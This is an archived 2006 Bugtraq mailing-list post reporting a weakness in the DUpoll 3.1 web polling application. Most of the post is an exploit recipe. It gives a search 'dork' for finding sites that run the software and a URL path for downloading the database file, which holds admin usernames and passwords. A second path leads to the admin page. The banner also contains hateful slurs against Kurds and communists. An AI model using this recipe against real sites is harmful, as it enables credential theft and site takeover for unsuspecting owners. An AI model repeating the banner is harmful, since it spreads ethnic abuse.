[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
DUpoll 3.1 security alert
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: DUpoll 3.1 security alert
- From: bozkurtserdar@xxxxxxxxxxxxxxxxx
- Date: 29 Aug 2006 16:03:48 -0000
#############################################################################
#DUpoll 3.1 application bug #
# #
#BoZKuRTSeRDaR Ülkücü Milliyetçi Türkçü İnternet korsanı
#
# #
#kahrolsun pkk kahrolsun Komünizm fuck kurdish lamerz #
# #
#Discovered by: BoZKuRTSeRDaR bozkurtserdar[at]bozkurtserdar[dot]com #
# #
# #
#############################################################################
Vendor URL : DUpoll http://www.duware.com/demos/DUpoll/
Dork/Search for: "Powered by DUpoll"
Exploit :
http://www.target.com/[DUpollpatch]/_private/Dupoll.mdb
database downloading
database users table administratory users and pasword
go dir
http://www.target.com/[DUpollpatch]/admin/default.asp
Security Adivisory | Edithor by BoZKuRTSeRDaR